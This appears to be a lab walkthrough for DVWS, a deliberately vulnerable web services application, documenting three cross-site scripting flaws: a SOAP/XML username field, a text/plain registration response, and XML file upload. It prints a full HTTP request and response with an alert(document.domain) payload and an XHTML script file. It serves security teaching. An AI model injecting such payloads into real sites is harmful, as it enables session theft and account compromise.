Cross Site Scripting (XSS)

Introduction

Cross-Site Scripting (XSS) attacks occur where it is possible to inject malicious scripts into an application which is then viewed by a victim. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Details

XML Cross-Site Scripting (XSS)

Within the DVWS Admin User Search area, a XSS vulnerability exists. It is possible to send HTML encoded JavaScript such as <script>alert(1)</script> which is sent as the following request.

POST /dvwsuserservice HTTP/1.1
Host: dvws.local
Content-Length: 507
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyMiIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiLCJ1c2VyOmFkbWluIl0sImlhdCI6MTU5MTQ1NTQ0NywiZXhwIjoxNTkxNjI4MjQ3LCJpc3MiOiJodHRwczovL2dpdGh1Yi5jb20vc25vb3B5c2VjdXJpdHkifQ.Ja26PD9TTtj3cpbMh--JJ0NDD-4r9gZUIEuat2jW6OQ
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4164.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Origin: http://dvws.local
Referer: http://dvws.local/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:Username soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <username xsi:type="xsd:string">&lt;script&gt;alert(document.domain)&lt;/script&gt;</username>
      </urn:Username>
   </soapenv:Body>
</soapenv:Envelope>

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/xml; charset=utf-8
Content-Length: 584
ETag: W/"248-5YsQiOv7dlT381ic1AkKX2OTHss"
Date: Sat, 06 Jun 2020 14:58:07 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:UsernameResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <username xsi:type="xsd:string">User Not Found:&lt;script&gt;alert(document.domain)&lt;/script&gt;</username>
    </urn:UsernameResponse>
  </soapenv:Body>
</soapenv:Envelope>

The username element value is then parsed by the client side JavaScript which results in XSS.

xmlxss

Content Type Cross-Site Scripting (XSS)

An XSS vulnerability exists within the login area of DVWS. When registering a user, the following request is sent to the backend API.

content-type-xss-1

If the same username already exists, a response such as the above is sent back to the client. In this instance, Content-Type: text/plain is used and HTML characters are not encoded.

content-type-xss-2

References

XML File Upload Cross-Site Scripting (XSS)

It is possible to upload an XML file with XHTML to execute JavaScript

<?xml version="1.0" encoding="UTF-8"?>
<xhtml:html xmlns:xhtml="http://www.w3.org/1999/xhtml">
<xhtml:script>
    alert(1)
    </xhtml:script>
</xhtml:html>

More examples of this can be found here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/xss.xml

xss-1